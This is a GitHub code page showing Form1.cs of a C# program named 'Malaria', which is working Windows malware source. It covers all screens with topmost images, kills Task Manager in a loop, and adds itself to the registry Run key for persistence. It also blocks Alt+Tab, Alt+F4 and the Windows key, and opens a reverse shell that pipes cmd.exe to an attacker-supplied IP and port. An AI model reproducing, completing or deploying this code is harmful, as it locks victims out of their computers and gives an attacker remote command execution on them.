-
Notifications
You must be signed in to change notification settings - Fork 0
/
Form1.cs
219 lines (190 loc) · 7.51 KB
/
Form1.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using Gma.System.MouseKeyHook;
using Malaria.Properties;
using Microsoft.Win32;
namespace Malaria
{
public partial class Malaria : Form
{
private IKeyboardMouseEvents _globalHook;
private StreamWriter streamWriter;
public Malaria()
{
InitializeComponent();
DisplayImageOnAllScreens();
new Thread(KillTaskManager).Start();
new Thread(AutoStart).Start();
new Thread(StartReverseShell).Start();
KeyPreview = true;
_globalHook = Hook.GlobalEvents();
_globalHook.KeyDown += GlobalHook_KeyDown;
}
private void StartReverseShell()
{
string serverIp = "127.0.0.1"; // Replace with your IP
int serverPort = 9001; // Replace with the desired port
try
{
using (TcpClient client = new TcpClient(serverIp, serverPort))
{
using (NetworkStream stream = client.GetStream())
{
using (StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream) { AutoFlush = true };
// Create a process to interact with cmd.exe
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += (sender, args) =>
{
if (!string.IsNullOrEmpty(args.Data))
{
try
{
streamWriter.WriteLine(args.Data); // Send command output
}
catch (Exception ex) { }
}
};
p.ErrorDataReceived += (sender, args) =>
{
if (!string.IsNullOrEmpty(args.Data))
{
try
{
streamWriter.WriteLine(args.Data); // Send command output
}
catch (Exception ex) { }
}
};
p.Start();
p.BeginOutputReadLine();
p.BeginErrorReadLine();
// Read commands from the server and pass them to cmd.exe
while (true)
{
string command = rdr.ReadLine();
if (!string.IsNullOrEmpty(command))
{
p.StandardInput.WriteLine(command);
p.StandardInput.Flush();
}
}
}
}
}
}
catch (Exception ex)
{
}
}
private void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
// Send the output from cmd.exe back to the server
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
streamWriter.WriteLine(outLine.Data);
}
catch (Exception err)
{
}
}
}
private void GlobalHook_KeyDown(object sender, KeyEventArgs e)
{
// Intercept ALT + TAB key combination and block it
if (e.Alt && e.KeyCode == Keys.Tab)
{
e.Handled = true;
return;
}
// Intercept Windows key (WIN) and block it
if (e.KeyCode == Keys.LWin || e.KeyCode == Keys.RWin)
{
e.Handled = true;
return;
}
// Intercept ALT + F4 key combination and block it
if (e.Alt && e.KeyCode == Keys.F4)
{
e.Handled = true;
return;
}
}
private static void AutoStart()
{
// Add the application to the Windows startup registry
var registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey?.SetValue("Malaria", Application.ExecutablePath);
}
private static void DisplayImageOnAllScreens()
{
// Loop through all connected screens and display a full-screen form with a background image
foreach (var screen in Screen.AllScreens)
{
var form = new Form
{
StartPosition = FormStartPosition.CenterScreen,
Location = screen.Bounds.Location,
Size = screen.Bounds.Size,
FormBorderStyle = FormBorderStyle.None,
WindowState = FormWindowState.Maximized,
TopMost = true,
BackgroundImageLayout = ImageLayout.Stretch
};
// Retrieve the background image from resources
var imageResource = Resources.ResourceManager.GetObject("bg");
if (imageResource is byte[] imageBytes)
{
form.BackgroundImage = Image.FromStream(new MemoryStream(imageBytes));
}
else if (imageResource is Image image)
{
form.BackgroundImage = image;
}
form.Show();
}
}
private static void KillTaskManager()
{
// Continuously monitor for and terminate Task Manager processes
while (true)
{
var processes = Process.GetProcessesByName("taskmgr");
foreach (var process in processes) process.Kill();
}
}
protected override void WndProc(ref Message m)
{
// Intercept Windows system commands to block ALT + F4 (form closure)
const int wmSysCommand = 0x0112;
const int scClose = 0xF060;
if (m.Msg == wmSysCommand && (int)m.WParam == scClose)
{
return; // Prevent the form from closing
}
base.WndProc(ref m); // Call base method for other messages
}
protected override void OnFormClosing(FormClosingEventArgs e)
{
// Unhook the global keyboard event hook when the form is closing
_globalHook.KeyDown -= GlobalHook_KeyDown;
_globalHook.Dispose();
base.OnFormClosing(e);
}
}
}